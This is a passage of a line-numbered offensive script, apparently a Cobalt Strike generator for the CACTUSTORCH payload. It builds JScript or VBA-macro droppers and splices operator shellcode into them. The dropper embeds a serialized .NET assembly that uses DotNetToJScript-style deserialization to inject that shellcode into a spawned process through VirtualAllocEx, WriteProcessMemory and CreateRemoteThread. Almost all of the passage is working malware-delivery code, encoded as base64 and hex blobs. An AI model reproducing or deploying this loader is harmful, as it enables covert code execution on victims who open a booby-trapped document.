387 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
388 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA\"+\r\n";
389 | $data = $data . "\"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A\"+\r\n";
390 | $data = $data . "\"VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA\"+\r\n";
391 | $data = $data . "\"AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA\"+\r\n";
392 | $data = $data . "\"BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs\"+\r\n";
393 | $data = $data . "\"AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA\"+\r\n";
394 | $data = $data . "\"cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA\"+\r\n";
395 | $data = $data . "\"AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA\"+\r\n";
396 | $data = $data . "\"UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu\"+\r\n";
397 | $data = $data . "\"ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA\"+\r\n";
398 | $data = $data . "\"SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV\"+\r\n";
399 | $data = $data . "\"AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA\"+\r\n";
400 | $data = $data . "\"AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP\"+\r\n";
401 | $data = $data . "\"AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA\"+\r\n";
402 | $data = $data . "\"VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw\"+\r\n";
403 | $data = $data . "\"AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA\"+\r\n";
404 | $data = $data . "\"LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
405 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
406 | $data = $data . "\"AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
407 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
408 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
409 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
410 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
411 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
412 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
413 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
414 | $data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
415 | $data = $data . "\"AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv\"+\r\n";
416 | $data = $data . "\"bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA\";\r\n";
417 | $data = $data . "var entry_class = 'cactusTorch';\r\n";
418 | $data = $data . "try {\r\n";
419 | $data = $data . " setversion();\r\n";
420 | $data = $data . " var stm = base64ToStream(serialized_obj);\r\n";
421 | $data = $data . " var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');\r\n";
422 | $data = $data . " var al = new ActiveXObject('System.Collections.ArrayList');\r\n";
423 | $data = $data . " var n = fmt.SurrogateSelector;\r\n";
424 | $data = $data . " var d = fmt.Deserialize_2(stm);\r\n";
425 | $data = $data . " al.Add(n);\r\n";
426 | $data = $data . " var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);\r\n";
427 | $data = $data . " o.flame(binary,code);\r\n";
428 | $data = $data . "} catch (e) {\r\n";
429 | $data = $data . " debug(e.message);\r\n";
430 | $data = $data . "}";
431 |
432 | # All inside $data at this point.
433 |
434 | }
435 | else{
436 | # They want VBA Macros
437 |
438 | # We need to take the base64 stream and chunk it up into format:
439 | # code = code & \"chunk\"
440 |
441 | $insert = " code = \"\"\r\n";
442 |
443 | @chunks = split("(?<=\\G.{100})", $b64payload);
444 |
445 | foreach $var (@chunks){
446 | $insert = $insert . " code = code & \"" . $var . "\"\r\n";
447 | }
448 |
449 | #$data = $insert;
450 |
451 | $data = $data . "Public binary As String\r\n";
452 | $data = $data . "Public code As String\r\n";
453 | $data = $data . "Sub Init()\r\n";
454 |
455 | # Insert binary here
456 | $data = $data . " binary = \"". %options["binary"] . "\"\r\n";
457 |
458 |
459 | $data = $data . " code = \"\"\r\n";
460 |
461 |
462 | # Insert code here
463 | $data = $data . $insert;
464 |
465 | $data = $data . "End Sub\r\n";
466 | $data = $data . "Private Function decodeHex(hex)\r\n";
467 | $data = $data . " On Error Resume Next\r\n";
468 | $data = $data . " Dim DM, EL\r\n";
469 | $data = $data . " Set DM = CreateObject(\"Microsoft.XMLDOM\")\r\n";
470 | $data = $data . " Set EL = DM.createElement(\"tmp\")\r\n";
471 | $data = $data . " EL.DataType = \"bin.hex\"\r\n";
472 | $data = $data . " EL.Text = hex\r\n";
473 | $data = $data . " decodeHex = EL.NodeTypedValue\r\n";
474 | $data = $data . "End Function\r\n";
475 | $data = $data . "Function Run()\r\n";
476 | $data = $data . " Dim serialized_obj\r\n";
477 | $data = $data . " serialized_obj = \"0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F\"\r\n";
478 | $data = $data . " serialized_obj = serialized_obj & \"6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C\"\r\n";
479 | $data = $data . " serialized_obj = serialized_obj & \"656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65\"\r\n";
480 | $data = $data . " serialized_obj = serialized_obj & \"6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E\"\r\n";
481 | $data = $data . " serialized_obj = serialized_obj & \"666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44\"\r\n";
482 | $data = $data . " serialized_obj = serialized_obj & \"656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508\"\r\n";
483 | $data = $data . " serialized_obj = serialized_obj & \"617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A\"\r\n";
484 | $data = $data . " serialized_obj = serialized_obj & \"6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C6567617465536572\"\r\n";
485 | $data = $data . " serialized_obj = serialized_obj & \"69616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65\"\r\n";
486 | $data = $data . " serialized_obj = serialized_obj & \"2E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C69622C2056\"\r\n";
487 | $data = $data . " serialized_obj = serialized_obj & \"657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237\"\r\n";
488 | $data = $data . " serialized_obj = serialized_obj & \"376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567\"\r\n";
489 | $data = $data . " serialized_obj = serialized_obj & \"617465060A0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C\"\r\n";
490 | $data = $data . " serialized_obj = serialized_obj & \"697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374\"\r\n";
491 | $data = $data . " serialized_obj = serialized_obj & \"656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374\"\r\n";
492 | $data = $data . " serialized_obj = serialized_obj & \"656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C646572090B000000090C\"\r\n";
493 | $data = $data . " serialized_obj = serialized_obj & \"000000090D00000004040000002F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A\"\r\n";
494 | $data = $data . " serialized_obj = serialized_obj & \"6174696F6E486F6C64657206000000044E616D650C417373656D626C794E616D6509436C6173734E616D65095369676E6174\"\r\n";
495 | $data = $data . " serialized_obj = serialized_obj & \"7572650A4D656D626572547970651047656E65726963417267756D656E7473010101010003080D53797374656D2E54797065\"\r\n";
496 | $data = $data . " serialized_obj = serialized_obj & \"5B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E616D6963496E766F6B65\"\r\n";
497 | $data = $data . " serialized_obj = serialized_obj & \"2853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E586D6C2E5363\"\r\n";
498 | $data = $data . " serialized_obj = serialized_obj & \"68656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E30\"\r\n";
499 | $data = $data . " serialized_obj = serialized_obj & \"2E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530\"\r\n";
500 | $data = $data . " serialized_obj = serialized_obj & \"383906140000000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D62\"\r\n";
501 | $data = $data . " serialized_obj = serialized_obj & \"6C790617000000044C6F61640A0F0C000000001E0000024D5A90000300000004000000FFFF0000B800000000000000400000\"\r\n";
502 | $data = $data . " serialized_obj = serialized_obj & \"000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD\"\r\n";
503 | $data = $data . " serialized_obj = serialized_obj & \"21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000\"\r\n";
504 | $data = $data . " serialized_obj = serialized_obj & \"00504500004C01030090D857590000000000000000E00022200B013000001600000006000000000000723500000020000000\"\r\n";
505 | $data = $data . " serialized_obj = serialized_obj & \"4000000000001000200000000200000400000000000000040000000000000000800000000200000000000003004085000010\"\r\n";
506 | $data = $data . " serialized_obj = serialized_obj & \"0000100000000010000010000000000000100000000000000000000000203500004F00000000400000900300000000000000\"\r\n";
507 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
508 | $data = $data . " serialized_obj = serialized_obj & \"000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E\"\r\n";
509 | $data = $data . " serialized_obj = serialized_obj & \"7465787400000078150000002000000016000000020000000000000000000000000000200000602E72737263000000900300\"\r\n";
510 | $data = $data . " serialized_obj = serialized_obj & \"00004000000004000000180000000000000000000000000000400000402E72656C6F6300000C000000006000000002000000\"\r\n";
511 | $data = $data . " serialized_obj = serialized_obj & \"1C00000000000000000000000000004000004200000000000000000000000000000000543500000000000048000000020005\"\r\n";
512 | $data = $data . " serialized_obj = serialized_obj & \"00F8210000281300000100000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n";
513 | $data = $data . " serialized_obj = serialized_obj & \"0000000000000000000000000000001E02280F00000A2A13300A00070100000100001104281000000A0A1201068E69281100\"\r\n";
514 | $data = $data . " serialized_obj = serialized_obj & \"000A73090000060C08167D35000004720100007013047203000070281200000A6F1300000A163119721D000070281200000A\"\r\n";
515 | $data = $data . " serialized_obj = serialized_obj & \"722B00007003281400000A13042B17721D000070281200000A724100007003281400000A13041104141414171A7E1500000A\"\r\n";
516 | $data = $data . " serialized_obj = serialized_obj & \"14081203280100000626097B0400000413051205281600000A7257000070281700000A2C6E110516731100000A0720003000\"\r\n";
517 | $data = $data . " serialized_obj = serialized_obj & \"001F40280200000613061206281600000A7257000070281800000A2C0A1105162804000006262A1613071208068E69281100\"\r\n";
518 | $data = $data . " serialized_obj = serialized_obj & \"000A110511060611081107280300000626110516731100000A16110616731100000A1616731100000A2805000006262A7A02\"\r\n";
519 | $data = $data . " serialized_obj = serialized_obj & \"7E1500000A7D0200000402280F00000A0202281900000A7D010000042A0000133002006000000000000000027E1500000A7D\"\r\n";
520 | $data = $data . " serialized_obj = serialized_obj & \"2B000004027E1500000A7D2C000004027E1500000A7D2D000004027E1500000A7D38000004027E1500000A7D39000004027E\"\r\n";
521 | $data = $data . " serialized_obj = serialized_obj & \"1500000A7D3A000004027E1500000A7D3B00000402280F00000A0202281900000A7D2A0000042A42534A4201000100000000\"\r\n";
522 | $data = $data . " serialized_obj = serialized_obj & \"000C00000076322E302E35303732370000000005006C00000028070000237E0000940700004C09000023537472696E677300\"\r\n";
523 | $data = $data . " serialized_obj = serialized_obj & \"000000E01000005C000000235553003C1100001000000023475549440000004C110000DC01000023426C6F62000000000000\"\r\n";
524 | $data = $data . " serialized_obj = serialized_obj & \"0002000001571D02140902000000FA01330016000001000000170000000900000050000000090000001F0000001900000033\"\r\n";
525 | $data = $data . " serialized_obj = serialized_obj & \"000000120000000100000001000000050000000100000001000000070000000000990601000000000006005C0592070600C9\"\r\n";
526 | $data = $data . " serialized_obj = serialized_obj & \"05920706008A0460070F00B20700000600B204E10606003005E10606001105E1060600B005E10606007C05E10606009505E1\"\r\n";
527 | $data = $data . " serialized_obj = serialized_obj & \"060600C904E10606009E04730706007C0473070600F404E1060600AB08A90606006104A90606004D05A9060600B006A90606\"\r\n";
528 | $data = $data . " serialized_obj = serialized_obj & \"00CA08A90606005907A9060600BE08A90606006606A9060600840673070000000025000000000001000100010010006D0600\"\r\n";
529 | $data = $data . " serialized_obj = serialized_obj & \"003D00010001000A001000F80700003D00010008000A011000CE060000410004000900020100001B08000049000800090002\"\r\n";
530 | $data = $data . " serialized_obj = serialized_obj & \"010000360800004900270009000A001000060700003D002A000900020100006D04000049003C000A0002010000F306000049\"\r\n";
531 | $data = $data . " serialized_obj = serialized_obj & \"0045000A0006007D06FA00060044073F0006002404FD00060074083F000600E7033F000600C803FA000600BD03FA0006069E\"\r\n";
532 | $data = $data . " serialized_obj = serialized_obj & \"0300015680B20203015680C00203015680640003015680880203015680C20003015680530203015680F101030156801D0203\"\r\n";
533 | $data = $data . " serialized_obj = serialized_obj & \"015680050203015680A001030156800203030156805E0103015680480103015680E101030156804D02030156803102030156\"\r\n";
534 | $data = $data . " serialized_obj = serialized_obj & \"806A03030156808203030156809902030156801D03030156807601030156807500030156803D0003015680270103015680A8\"\r\n";
535 | $data = $data . " serialized_obj = serialized_obj & \"00030156803A0303015680B90103015680180103015680C60103015680E502030106069E0300015680910007015680720207\"\r\n";
536 | $data = $data . " serialized_obj = serialized_obj & \"010600A603FA000600EF033F00060017073F00060033043F0006004B03FA0006009A03FA000600E705FA000600EF05FA0006\"\r\n";
537 | $data = $data . " serialized_obj = serialized_obj & \"004708FA0006005508FA000600E404FA0006002E08FA000600E7080B0106000D000B01060019003F000600D2083F000600DC\"\r\n";
538 | $data = $data . " serialized_obj = serialized_obj & \"083F00060034073F0006069E0300015680DE020E015680EF000E0156809D010E015680D8020E015680D5010E0156800F010E\"\r\n";
539 | $data = $data . " serialized_obj = serialized_obj & \"01568094010E01568003010E0106069E0300015680E70012015680570012015680D500120156805803120156806902120156\"\r\n";
540 | $data = $data . " serialized_obj = serialized_obj & \"804F0312015680DD00120156806003120156801106120156802406120156803906120100000000800096202E001601010000\"\r\n";
541 | $data = $data . " serialized_obj = serialized_obj & \"00000080009620F3082A010B000000000080009620090935011000000000008000962063083F0115000000000080009120D4\"\r\n";
542 | $data = $data . " serialized_obj = serialized_obj & \"034501170050200000000086183E0706001E0058200000000086004D0450011E006B210000000086183E07060020008C2100\"\r\n";
543 | $data = $data . " serialized_obj = serialized_obj & \"00000086183E0706002000000001003B0400000200530400000300E40700000400D10700000500C107000006000B08000007\"\r\n";
544 | $data = $data . " serialized_obj = serialized_obj & \"00BC08000008001C0901000900040702000A00CC06000001001B04000002008B08000003000306000004006B0400000500B2\"\r\n";
545 | $data = $data . " serialized_obj = serialized_obj & \"08000001007408000002007D0800000300210700000400030600000500B50600000100740800000200FA0300000100740800\"\r\n";
546 | $data = $data . " serialized_obj = serialized_obj & \"000200D10700000300F705000004009508000005002807000006000B0800000700B20300000100020900000200010009003E\"\r\n";
547 | $data = $data . " serialized_obj = serialized_obj & \"07010011003E07060019003E070A0029003E07100031003E07100039003E07100041003E07100049003E07100051003E0710\"\r\n";
548 | $data = $data . " serialized_obj = serialized_obj & \"0059003E07100061003E07150069003E07100071003E07100089003E07060079003E070600990053062900A1003E070100A9\"\r\n";
549 | $data = $data . " serialized_obj = serialized_obj & \"0004042F00B10079063400B100A4083800A10012073F00A10064064200B1003B094600B1002F094600B9000A064C00090024\"\r\n";
550 | $data = $data . " serialized_obj = serialized_obj & \"005A00090028005F0009002C006400090030006900090034006E0009003800730009003C007800090040007D000900440082\"\r\n";
551 | $data = $data . " serialized_obj = serialized_obj & \"0009004800870009004C008C00090050009100090054009600090058009B0009005C00A00009006000A50009006400AA0009\"\r\n";
552 | $data = $data . " serialized_obj = serialized_obj & \"006800AF0009006C00B40009007000B90009007400BE0009007800C30009007C00C80009008000CD0009008400D200090088\"\r\n";
553 | $data = $data . " serialized_obj = serialized_obj & \"00D70009008C00DC0009009000E10009009400E60009009800EB000900A0005A000900A4005F000900F40096000900F8009B\"\r\n";
554 | $data = $data . " serialized_obj = serialized_obj & \"000900FC00F00009000001B90009000401E10009000801F50009000C01BE0009001001C300090018016E0009001C01730009\"\r\n";
555 | $data = $data . " serialized_obj = serialized_obj & \"0020017800090024017D00090028015A0009002C015F0009003001640009003401690009003801820009003C018700090040\"\r\n";
556 | $data = $data . " serialized_obj = serialized_obj & \"018C002E000B0056012E0013005F012E001B007E012E00230087012E002B0087012E00330098012E003B0098012E00430087\"\r\n";
557 | $data = $data . " serialized_obj = serialized_obj & \"012E004B0087012E00530098012E005B009E012E006300A4012E006B00CE0143005B009E01A30073005A00C30073005A0003\"\r\n";
558 | $data = $data . " serialized_obj = serialized_obj & \"0173005A00230173005A001A008C06000103002E00010000010500F30801000001070009090100000109006308010000010B\"\r\n";
559 | $data = $data . " serialized_obj = serialized_obj & \"00D4030100048000000100000000000000000000000000F70000000200000000000000000000005100A90300000000030002\"\r\n";
560 | $data = $data . " serialized_obj = serialized_obj & \"0004000200050002000600020007000200080002000900020000000000007368656C6C636F64653332006362526573657276\"\r\n";
561 | $data = $data . " serialized_obj = serialized_obj & \"656432006C70526573657276656432003C4D6F64756C653E0043726561746550726F6365737341004352454154455F425245\"\r\n";
562 | $data = $data . " serialized_obj = serialized_obj & \"414B415741595F46524F4D5F4A4F4200455845435554455F52454144004352454154455F53555350454E4445440050524F43\"\r\n";
563 | $data = $data . " serialized_obj = serialized_obj & \"4553535F4D4F44455F4241434B47524F554E445F454E44004455504C49434154455F434C4F53455F534F5552434500435245\"\r\n";
564 | $data = $data . " serialized_obj = serialized_obj & \"4154455F44454641554C545F4552524F525F4D4F4445004352454154455F4E45575F434F4E534F4C4500455845435554455F\"\r\n";
565 | $data = $data . " serialized_obj = serialized_obj & \"5245414457524954450045584543555445005245534552564500434143545553544F5243480057524954455F574154434800\"\r\n";
566 | $data = $data . " serialized_obj = serialized_obj & \"504859534943414C0050524F46494C455F4B45524E454C004352454154455F50524553455256455F434F44455F415554485A\"\r\n";
567 | $data = $data . " serialized_obj = serialized_obj & \"5F4C4556454C004352454154455F5348415245445F574F575F56444D004352454154455F53455041524154455F574F575F56\"\r\n";
568 | $data = $data . " serialized_obj = serialized_obj & \"444D0050524F434553535F4D4F44455F4241434B47524F554E445F424547494E00544F505F444F574E00474F004352454154\"\r\n";
569 | $data = $data . " serialized_obj = serialized_obj & \"455F4E45575F50524F434553535F47524F55500050524F46494C455F555345520050524F46494C455F534552564552004C41\"\r\n";
570 | $data = $data . " serialized_obj = serialized_obj & \"5247455F5041474553004352454154455F464F524345444F530049444C455F5052494F524954595F434C415353005245414C\"\r\n";
571 | $data = $data . " serialized_obj = serialized_obj & \"54494D455F5052494F524954595F434C41535300484947485F5052494F524954595F434C4153530041424F56455F4E4F524D\"\r\n";
572 | $data = $data . " serialized_obj = serialized_obj & \"414C5F5052494F524954595F434C4153530042454C4F575F4E4F524D414C5F5052494F524954595F434C415353004E4F4143\"\r\n";
573 | $data = $data . " serialized_obj = serialized_obj & \"43455353004455504C49434154455F53414D455F4143434553530044455441434845445F50524F4345535300435245415445\"\r\n";
574 | $data = $data . " serialized_obj = serialized_obj & \"5F50524F5445435445445F50524F434553530044454255475F50524F434553530044454255475F4F4E4C595F544849535F50\"\r\n";
575 | $data = $data . " serialized_obj = serialized_obj & \"524F4345535300524553455400434F4D4D4954004352454154455F49474E4F52455F53595354454D5F44454641554C540043\"\r\n";
576 | $data = $data . " serialized_obj = serialized_obj & \"52454154455F554E49434F44455F454E5649524F4E4D454E5400455854454E4445445F53544152545550494E464F5F505245\"\r\n";
577 | $data = $data . " serialized_obj = serialized_obj & \"53454E54004352454154455F4E4F5F57494E444F570064775800524541444F4E4C5900455845435554455F5752495445434F\"\r\n";
578 | $data = $data . " serialized_obj = serialized_obj & \"505900494E48455249545F504152454E545F414646494E49545900494E48455249545F43414C4C45525F5052494F52495459\"\r\n";
579 | $data = $data . " serialized_obj = serialized_obj & \"006477590076616C75655F5F006362006D73636F726C6962006C705468726561644964006477546872656164496400647750\"\r\n";
580 | $data = $data . " serialized_obj = serialized_obj & \"726F6365737349640043726561746552656D6F74655468726561640068546872656164006C70526573657276656400754578\"\r\n";
581 | $data = $data . " serialized_obj = serialized_obj & \"6974436F646500476574456E7669726F6E6D656E745661726961626C65006C7048616E646C650062496E686572697448616E\"\r\n";
582 | $data = $data . " serialized_obj = serialized_obj & \"646C65006C705469746C65006C704170706C69636174696F6E4E616D6500666C616D65006C70436F6D6D616E644C696E6500\"\r\n";
583 | $data = $data . " serialized_obj = serialized_obj & \"56616C75655479706500666C416C6C6F636174696F6E5479706500477569644174747269627574650044656275676761626C\"\r\n";
584 | $data = $data . " serialized_obj = serialized_obj & \"6541747472696275746500436F6D56697369626C6541747472696275746500417373656D626C795469746C65417474726962\"\r\n";
585 | $data = $data . " serialized_obj = serialized_obj & \"75746500417373656D626C7954726164656D61726B41747472696275746500647746696C6C41747472696275746500417373\"\r\n";
586 | $data = $data . " serialized_obj = serialized_obj & \"656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E417474\"\r\n";
587 | $data = $data . " serialized_obj = serialized_obj & \"72696275746500417373656D626C794465736372697074696F6E41747472696275746500466C616773417474726962757465\"\r\n";
588 | $data = $data . " serialized_obj = serialized_obj & \"00436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F647563744174\"\r\n";
589 | $data = $data . " serialized_obj = serialized_obj & \"7472696275746500417373656D626C79436F7079726967687441747472696275746500417373656D626C79436F6D70616E79\"\r\n";
590 | $data = $data . " serialized_obj = serialized_obj & \"4174747269627574650052756E74696D65436F6D7061746962696C6974794174747269627574650064775853697A65006477\"\r\n";
591 | $data = $data . " serialized_obj = serialized_obj & \"5953697A65006477537461636B53697A6500647753697A650053697A654F660047554152445F4D6F646966696572666C6167\"\r\n";
592 | $data = $data . " serialized_obj = serialized_obj & \"004E4F43414348455F4D6F646966696572666C6167005752495445434F4D42494E455F4D6F646966696572666C6167004672\"\r\n";
593 | $data = $data . " serialized_obj = serialized_obj & \"6F6D426173653634537472696E6700546F537472696E6700636163747573546F726368006765745F4C656E677468004D6172\"\r\n";
594 | $data = $data . " serialized_obj = serialized_obj & \"7368616C006B65726E656C33322E646C6C00434143545553544F5243482E646C6C0053797374656D00456E756D006C704E75\"\r\n";
595 | $data = $data . " serialized_obj = serialized_obj & \"6D6265724F6642797465735772697474656E006C7050726F63657373496E666F726D6174696F6E0053797374656D2E526566\"\r\n";
596 | $data = $data . " serialized_obj = serialized_obj & \"6C656374696F6E004D656D6F727950726F74656374696F6E006C7053746172747570496E666F005A65726F006C704465736B\"\r\n";
597 | $data = $data . " serialized_obj = serialized_obj & \"746F7000627566666572006C70506172616D6574657200685374644572726F72002E63746F72006C70536563757269747944\"\r\n";
598 | $data = $data . " serialized_obj = serialized_obj & \"657363726970746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D65\"\r\n";
599 | $data = $data . " serialized_obj = serialized_obj & \"2E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C657253657276696365730044\"\r\n";
600 | $data = $data . " serialized_obj = serialized_obj & \"6562756767696E674D6F6465730062496E686572697448616E646C6573006C7054687265616441747472696275746573006C\"\r\n";
601 | $data = $data . " serialized_obj = serialized_obj & \"7050726F6365737341747472696275746573005365637572697479417474726962757465730064774372656174696F6E466C\"\r\n";
602 | $data = $data . " serialized_obj = serialized_obj & \"6167730043726561746550726F63657373466C616773006477466C616773004475706C69636174654F7074696F6E73006477\"\r\n";
603 | $data = $data . " serialized_obj = serialized_obj & \"58436F756E74436861727300647759436F756E744368617273005465726D696E61746550726F63657373006850726F636573\"\r\n";
604 | $data = $data . " serialized_obj = serialized_obj & \"73006C704261736541646472657373006C7041646472657373006C7053746172744164647265737300436F6E636174004F62\"\r\n";
605 | $data = $data . " serialized_obj = serialized_obj & \"6A65637400666C50726F74656374006C70456E7669726F6E6D656E7400436F6E766572740068537464496E70757400685374\"\r\n";
606 | $data = $data . " serialized_obj = serialized_obj & \"644F7574707574007753686F7757696E646F77005669727475616C416C6C6F6345780062696E61727900577269746550726F\"\r\n";
607 | $data = $data . " serialized_obj = serialized_obj & \"636573734D656D6F7279006C7043757272656E744469726563746F7279006F705F457175616C697479006F705F496E657175\"\r\n";
608 | $data = $data . " serialized_obj = serialized_obj & \"616C6974790000000000010019500072006F006700720061006D0057003600340033003200000D770069006E006400690072\"\r\n";
609 | $data = $data . " serialized_obj = serialized_obj & \"0000155C0053007900730057004F005700360034005C0000155C00530079007300740065006D00330032005C000003300000\"\r\n";
610 | $data = $data . " serialized_obj = serialized_obj & \"00458F9BCEE2EAC44F9A4920332ECA615E00042001010803200001052001011111042001010E04200101020E07091D051812\"\r\n";
611 | $data = $data . " serialized_obj = serialized_obj & \"1C11100E181808180500011D050E0400010E0E032000080600030E0E0E0E0206180320000E050002020E0E040001081C08B7\"\r\n";
612 | $data = $data . " serialized_obj = serialized_obj & \"7A5C561934E08904010000000402000000040400000004080000000410000000042000000004400000000480000000040001\"\r\n";
613 | $data = $data . " serialized_obj = serialized_obj & \"0000040002000004000400000400080000040010000004002000000400400000040080000004000001000400000200040000\"\r\n";
614 | $data = $data . " serialized_obj = serialized_obj & \"0400040000080004000010000400002000040000000104000000020400000004040000000804000000100400000020040000\"\r\n";
615 | $data = $data . " serialized_obj = serialized_obj & \"00400400000080040030000004000040000206080206020206090306111403061118020606030611200306112413000A180E\"\r\n";
616 | $data = $data . " serialized_obj = serialized_obj & \"0E120C120C021114180E121C1011100A000518181818112011240900050218181D0518080500020218090A00071818180918\"\r\n";
617 | $data = $data . " serialized_obj = serialized_obj & \"180918052002010E0E0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F77730108\"\r\n";
618 | $data = $data . " serialized_obj = serialized_obj & \"01000200000000001001000B434143545553544F52434800000501000000000501000100002901002435363539386631632D\"\r\n";
619 | $data = $data . " serialized_obj = serialized_obj & \"366438382D343939342D613339322D61663333376162653537373700000C010007312E302E302E3000000048350000000000\"\r\n";
